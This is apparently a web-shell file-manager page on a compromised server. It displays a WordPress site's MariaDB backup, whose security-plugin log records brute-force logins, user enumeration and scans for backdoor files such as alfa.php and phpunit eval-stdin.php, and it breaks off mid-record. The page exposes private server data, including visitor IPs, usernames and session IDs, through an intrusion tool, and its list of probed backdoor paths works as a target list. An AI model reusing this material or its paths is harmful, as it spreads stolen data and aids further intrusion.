HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: healthinsuranceukorguk (1111)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //restore/20230201.ashbookscouk.sql
-- MariaDB dump 10.19  Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: ashbookscouk
-- ------------------------------------------------------
-- Server version	10.5.18-MariaDB-1:10.5.18+maria~ubu2004

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `ashbookscouk`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `ashbookscouk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;

USE `ashbookscouk`;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
INSERT INTO `cerber_log` VALUES ('20.69.165.194',340108738,'',0,1635949927.6951,70,'LmuPaQIc3e01tfpWXMbdlYyT','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('45.90.219.64',760929088,'',0,1635953875.1272,55,'TikzBIlq9nFZSV26dvD3ArbO','','19|0|0|0|ashbooks.co.uk/old-index.php'),('93.113.111.100',1567715172,'',0,1635959246.9274,70,'AFZhoGgEHOJb2iwUnl6CreSN','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('93.113.111.100',1567715172,'',0,1635959247.0260,70,'Eg9JWZwTDf1MCU5qF4NV82ev','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('171.217.251.23',2883189527,'',0,1635964114.0364,55,'ChgNjAI9YboOc8rdKuxwViUD','','19|0|0|0|www.ashbooks.co.uk/l.php'),('185.191.34.215',3116311255,'',0,1635966576.2788,55,'Kc3EaWqv4ygN8oPH9iZY5UsQ','','19|0|0|0|ashbooks.co.uk/wp-admin/network/user-about.php'),('69.30.217.110',1159649646,'admin',0,1635968836.4170,7,'knjlpRJtHmoyOGr68QhqiBXx','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.118.203',3233511115,'ashbooks',0,1635979330.5142,51,'SrBDkPQa3UVw2TJgfNqXivRI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1635985953.3059,55,'eoruZysW457IRHb9wcOJ2jB8','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/2019/index.php'),('20.106.201.72',342542664,'ashbooks',0,1635989237.1220,51,'bfLZCAqPczXlw8O2nMkGINgE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.26',1159655450,'ashbooks',0,1635991720.0941,51,'C1de6SVl79Ppg3GMmRQc5WXN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1635991857.6853,51,'BeyGJVn9DQhK7jkzYsxUbo3A','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1635994459.1998,51,'Gzu1M6CXgvhHW0dYUwZBefsb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.107.68.50',577455154,'',0,1635995833.4911,55,'ZBUQcAWRsYymuE0d3FL5if2w','','19|0|0|0|ashbooks.co.uk/style.php'),('34.107.68.50',577455154,'',0,1635995846.1235,55,'jpYNnkEZFGc4Uri8P3CKdbVg','','19|0|0|0|ashbooks.co.uk/moduless.php'),('34.107.68.50',577455154,'',0,1635995859.3921,55,'54o3TNeJEdlinwtIPvjs896K','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('34.107.68.50',577455154,'',0,1635995871.4123,55,'mSPjD0yARwzYqldcTXrUIoWV','','19|0|0|0|ashbooks.co.uk/admin.php'),('34.107.68.50',577455154,'',0,1635995926.3230,55,'uK13DN7JALmjMRZs4Vfd0YbI','','19|0|0|0|ashbooks.co.uk/boom.php'),('34.107.68.50',577455154,'',0,1635995926.3861,10,'uK13DN7JALmjMRZs4Vfd0YbI','','707|0|0|0|ashbooks.co.uk/boom.php'),('34.107.68.50',577455154,'',0,1635995939.0693,55,'1NdfMni4W6AuJmQGh23ZlRep','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('34.107.68.50',577455154,'',0,1635995952.4115,55,'AEvRTBSJ59LIHnMXOKd0WV38','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('34.107.68.50',577455154,'',0,1635995965.1278,100,'rESP4fCszeadm1ObKgNQj9Zl','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('3.96.204.29',56675357,'',0,1635995971.5768,70,'ACDah9bEP1UO0FZtfdgT7sen','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('34.107.68.50',577455154,'',0,1635995992.1651,100,'46bQdfvs79nNer3UYx1Wz5DJ','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('34.107.68.50',577455154,'',0,1635996003.2573,100,'mq5VofExGJCT4F96Zr0YvReS','','13|0|0|0|ashbooks.co.uk/larva.php'),('34.107.68.50',577455154,'',0,1635996017.4242,100,'LsJmVKM9vP8hCtZyOzcndYN3','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('34.107.68.50',577455154,'',0,1635996031.6528,55,'XTNlA4zu5LaPvmFGgoh7wdjs','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('34.107.68.50',577455154,'',0,1635996042.9948,55,'igED8JAOx2aW9S1nulCe53yT','','19|0|0|0|ashbooks.co.uk/alfa.php'),('34.107.68.50',577455154,'',0,1635996053.9248,55,'ZtQg3zpBKJrmwRMjoP1IT0HD','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('34.107.68.50',577455154,'',0,1635996065.8849,55,'dB3WK4kLmVGsavP6yruJUglD','','19|0|0|0|ashbooks.co.uk/cindex.php'),('34.107.68.50',577455154,'',0,1635996080.3611,55,'tiAN9TWMHmkrC4cg2Y6uG1ap','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('34.107.68.50',577455154,'',0,1635996095.2379,55,'d4fx2jXs36WKReHAUYmoQi0N','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('34.107.68.50',577455154,'',0,1635996111.2633,55,'Af8HUciMmua4zVF0WpvnYrRj','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('34.107.68.50',577455154,'',0,1635996127.5665,55,'EGIJQLrZdg6eab72c0jUsBP4','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('34.107.68.50',577455154,'',0,1635996142.6257,55,'hscnwHeIJE37TtRof6YpNl5v','','19|0|0|0|ashbooks.co.uk/old-index.php'),('34.107.68.50',577455154,'',0,1635996155.1281,55,'ZLU2ul536aTxsDbjGH1gKYVn','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('34.107.68.50',577455154,'',0,1635996167.2288,55,'XVpoRWHulDFQA3KeYwb27rfy','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('34.107.68.50',577455154,'',0,1635996180.4740,55,'Zln0eEvfjpOUF9MBqLI8Wy1d','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('34.107.68.50',577455154,'',0,1635996189.8787,55,'yxgjTQZltRCHfP90dFWU41Dp','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('34.107.68.50',577455154,'',0,1635996203.3853,55,'xvoGXzwl34ALJ5kYaUerujS7','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('34.107.68.50',577455154,'',0,1635996215.9697,55,'uclX73In54LDf0WUEC2pRJw1','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('34.107.68.50',577455154,'',0,1635996224.1860,18,'vF7V6tLHlRyJpxeE32sUW8fu','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('34.107.68.50',577455154,'',0,1635996236.3427,55,'sricjI0VWUhF5nwdyOSNfm1P','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('34.107.68.50',577455154,'',0,1635996247.9428,100,'Zna28w3g6MWjcXioydvNHeur','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('34.107.68.50',577455154,'',0,1635996259.5897,100,'7CsWBKQYb8lxePMph4gIfOnm','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('34.107.68.50',577455154,'',0,1635996271.5226,55,'6iSe1Jq2fz7Rb0yAMKXxaYhr','','19|0|0|0|ashbooks.co.uk/haders.php'),('34.107.68.50',577455154,'',0,1635996286.2710,100,'oBhjRtKI4L63fTrpZzlC7yNi','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('34.107.68.50',577455154,'',0,1635996296.0605,55,'mTCPIxn8OSM6BFcyv9RQ1b3Z','','19|0|0|0|ashbooks.co.uk/legion.php'),('34.107.68.50',577455154,'',0,1635996307.8647,55,'Nak8tI3j0dORnCG1eoWvPABQ','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('34.107.68.50',577455154,'',0,1635996320.4387,55,'xq4hswjIFZ6nr8W7tBuUfMeo','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('34.107.68.50',577455154,'',0,1635996332.8175,55,'Hy2MJKhVTdCNYOA74wQj5Zgc','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('34.107.68.50',577455154,'',0,1635996345.3935,55,'cBobPnxS5hYTgzF76UvH0rRW','','19|0|0|0|ashbooks.co.uk/up.php'),('34.107.68.50',577455154,'',0,1635996356.1204,55,'KMj2atSeoOEJT5UyG6Ag9B0b','','19|0|0|0|ashbooks.co.uk/upload.php'),('34.107.68.50',577455154,'',0,1635996369.4027,55,'Miuh8NzQcE3GyrpjT4FOeAIs','','19|0|0|0|ashbooks.co.uk/config.php'),('34.107.68.50',577455154,'',0,1635996380.5238,100,'8LBsFP3JRi9zOoZUkWxqwdM1','','13|0|0|0|ashbooks.co.uk/test.php'),('34.107.68.50',577455154,'',0,1635996391.0032,55,'JgmAeM7Hjia09LKnTx3UVCDd','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('34.107.68.50',577455154,'',0,1635996404.4824,55,'CozxtHZIAXp34vLJ0nFNSP9g','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('34.107.68.50',577455154,'',0,1635996420.0821,55,'Ua78sQygYCd3ABfrVhOKxFk1','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('20.106.201.72',342542664,'ashbooks',0,1635997234.0349,51,'VZa0rd7cwYLIBT4MxoWqCzhO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1635999892.9556,51,'04tTuCkIi9OXgYaW7J3fGHsq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636002709.2489,51,'9l8s61jFUYxna5OytDAiKGMQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636005699.5266,51,'jhDPT34L8yQoOzVGZMf6tsra','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636008746.1831,51,'OXCrmz0xUAJQM8k12sbpVZiB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.157',1159653277,'ashbooks',0,1636009547.5540,51,'z7B4yEPxLWcYDdrbQkJm1afR','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636012521.9752,51,'WjufZBQiyhLStnKpEr9U1RVx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636015555.3683,51,'aK8uHSWU4yTtPIBV5Y9wfb1M','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636018714.7238,51,'s8ScvF6w2t4D035bGAyplVKL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.203',3233511115,'ashbooks',0,1636021672.3327,51,'4HGtUw1E3VIdl9s2yBCrT7Kh','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636021864.3897,51,'ldu16q9z3cWE8xm7jnsHRhaC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636024422.8590,51,'jnaRk1KiMftITyoqlLJ7eZP5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636025052.2583,51,'TEOwe9qXgIrv2zny1CQZsS5W','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636028145.5057,51,'RvBap48Uw2YZucMNnkSsl5X0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636031284.0902,51,'1tnkyqDWOixM0lf2QbhFHUIm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636034517.3583,51,'IQaF9g8rspuZPAtbhjXy0Hvi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636037758.7521,51,'HrJhz9Nb4160dQLIUYAsq5m8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1636040698.8108,55,'Ev8LXJd2yH7rf0jqBxeF6ma3','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('20.106.201.72',342542664,'ashbooks',0,1636040965.9908,51,'tk1y4NIhCz0GKl2mQsv7SPYw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.231.60.198',2917612742,'',0,1636043898.4865,55,'MWIQeVPFvYhti8GslURJoTE2','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636043905.6601,55,'eqgHfw6tQJpbyzlAo1487M2v','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044093.8672,55,'Bm38WAt4TYOzDQECoN9VIyur','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044100.6613,55,'e5gzsA4hN8bRIVud3wOE7YTP','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044110.4467,55,'yWNfqz4P6rBYwdUnchiXpM23','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044110.4698,10,'yWNfqz4P6rBYwdUnchiXpM23','','707|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044117.8186,55,'a0SEtVFW47eUCYJqcuhPInyd','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044126.5363,55,'NblcKkYv3ayUgfTMmEjOpqtH','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('20.106.201.72',342542664,'ashbooks',0,1636044226.9987,51,'etYK3JAE5WjaGrcTR4FCwPUv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.231.60.198',2917612742,'',0,1636044262.6608,55,'AVqYbvrNsZRMOP4Jk5uBj8ep','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044270.2743,55,'mSW3rfqFpU5Djeo8M2tAOB1I','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636044301.5982,55,'gB3Q8ceO2tGsvijPTbzZYlAk','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('20.106.201.72',342542664,'ashbooks',0,1636047432.3665,51,'PbJrfntjlwcqYTUsMyKdVxBi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.242.162.35',1542627875,'',0,1636048635.6070,55,'OaTFB3vj8Y9eCqGucLKibdwA','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('20.106.201.72',342542664,'ashbooks',0,1636050686.8037,51,'gq6O9JtFIinz1pUodLbr5u2f','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.122.130.155',679117467,'',0,1636052320.5618,70,'qavZo4pmrLde6Qn8tGKhu02y','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('20.106.201.72',342542664,'ashbooks',0,1636053877.9239,51,'puKR6qs02vTx98mlgWEAYLUn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636057107.4399,51,'Z7ztWbo1Bnk85QGeCxSsOh9R','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636060326.7922,51,'29gGdWNyc5AxzY4m863DSJtv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636063555.1834,51,'ZIA4Dsw8l9zHGxaK6U7e3oh0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636066711.3303,51,'k9rTvcO0FmGjtKuspHCiE3Bx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636069894.1406,51,'tUy4uhnwCRQV6rilHKeD7pJY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636073111.5020,51,'rMwE5jPhkI0ubmzGDOoeBLai','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.201.72',342542664,'ashbooks',0,1636076359.8101,51,'RvtWfmesM0bKPjxDYnazq4UI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.203',3233511115,'ashbooks',0,1636082136.5469,51,'tLXaTsIUdcWovFPJir8KnbpH','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('86.104.39.238',1449666542,'',0,1636093602.9596,70,'hVg0vwTsmKD7PHXiuCltLJSc','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('176.107.128.162',2959835298,'',0,1636096265.5915,70,'4kSQAtsbYyJzGxCMUrITXHdj','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('155.133.129.13',2609217805,'admin',0,1636100322.3241,7,'hnDVCs4t29cTvpw6fYSPkXl3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.248.157.130',1761123714,'',0,1636103058.5187,70,'m7SEhlKQJ094d2yUfFaHuOCk','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('82.165.222.205',1386602189,'',0,1636105372.5393,55,'1xvzflua5m0OwdTnHD7JPtyF','','19|0|0|0|ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi'),('196.206.165.155',3301877147,'',0,1636114706.8513,70,'63MrzBm7TLEYfwpPxyctDWC9','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('196.206.165.155',3301877147,'lembursawah',0,1636114713.6612,51,'K4NbCu6j0zYB57JWv1RpiQcF','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('204.12.198.242',3423389426,'ashbooks',0,1636119267.1656,51,'cy8nWgOJaoD4fqlRFY1Cbhtj','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('196.206.165.155',3301877147,'',0,1636121131.1933,70,'7I3alrVUy6RMLDAGwfogZWui','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('196.206.165.155',3301877147,'admin',0,1636121139.8771,7,'DmfdTSZH6kJEFpCjiYbRLX0n','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('123.58.210.246',2067452662,'',0,1636122643.6061,55,'ueynj0frV2ES9csUGNPlaXiJ','','19|0|0|0|www.ashbooks.co.uk/api/web/user/getIndexData.php'),('123.58.210.246',2067452662,'',0,1636122693.8302,55,'9NkluXCVUbSzyAT31rZaBh6q','','19|0|0|0|www.ashbooks.co.uk/douyinpay.php'),('20.39.54.252',338114300,'',0,1636122769.8678,70,'Q4bGW0clZDsxEhq9jp1P6VvT','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('82.165.185.225',1386592737,'',0,1636126112.2905,55,'4EXj0DBpQwgmSxGsHLuhlvoJ','','19|0|0|0|ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi'),('82.208.189.233',1389411817,'',0,1636128864.6141,55,'SYb7pmljRV2GOcyL0MCD4g1t','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('51.75.15.189',860557245,'admin',0,1636131588.8400,7,'ebk6WPKFAhjM5TzLiw82YlUn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1636134961.9851,55,'jOYcpKvhe0yAuVaLGNdID6sX','','19|0|0|0|ashbooks.co.uk/1index.php'),('82.208.189.233',1389411817,'',0,1636137123.9420,55,'PduVSaWE7LwUni4cRMv8oZb6','','19|0|0|0|ashbooks.co.uk/3index.php'),('40.121.16.96',679022688,'',0,1636138214.7397,70,'WY1aGfruELxP27tvDS8zX36l','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('40.121.16.96',679022688,'admin',0,1636138218.5475,7,'dOG8lFWt5VMuenNkpYU39KEz','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('5.188.62.19',96222739,'',0,1636141479.7871,55,'u8crWgaNoR79ZhVFesYBpiMJ','','19|0|0|0|ashbooks.co.uk/wp-config.php.1'),('5.188.62.19',96222739,'',0,1636141480.0734,55,'togBPl63y8JHWxVOUuaQrIqM','','19|0|0|0|ashbooks.co.uk/wp-config.ph